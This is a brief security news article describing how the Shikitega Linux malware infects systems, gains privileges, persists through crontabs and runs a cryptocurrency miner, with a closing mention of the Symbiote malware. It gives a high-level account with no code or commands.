There’s a new dangerous Linux malware circling the web. Dubbed Shikitega, the malware has been infecting both Linux computers and IoT devices with additional payloads.
How Does the Shikitega Malware Operate to Infect a Linux System?
Discovered by T&T Alien Labs, the malware is delivered through a multistage infection chain where each module responds to a part of the payload, downloading and executing the next one. The Shikitega malware can be utilized to obtain full control over the compromised system. The malware is also equipped with a cryptocurrency miner which is “set to persist,” as per the researchers’ discoveries.
Shikitega downloads and executes the Metasploit’s Mettle meterpreter to boost its control on compromised endpoints. The malware also exploits a list of Linux system vulnerabilities to gain high privileges, achieve persistence and execute the cryptocurrency miner. It is also noteworthy that the threat utilized a polymorphic encoder to obstruct anti-virus detections. To perform its malicious activities, the malware leverages cloud services where it stores some of its command-and-control servers.
How Does Shikitega Malware Achieve Persistence?
Persistence on infected systems is achieved by downloading and executing 5 specific shell scripts, and setting 4 crontabs [job schedulers on Unix-like operating systems], two of which are for the current logged-in user and the other two – for the root user. If upon checking the crontab command is not available on the machine, the malware will install it.
Is it notable that the crypto-mining component of the malware, which downloads and executes the XMRig miner, also sets a crontab, thus making the miner persistent.
In conclusion, Shikitega malware is an example of malware delivered in a sophisticated way, using a polymorphic encoder and gradually delivering its payload.
Symbiote, discovered by Blackberry researchers, is another recently discovered Linux malware designed to infect all running processes on infected machines. The malware is capable of stealing account credentials and providing backdoor access to its operators.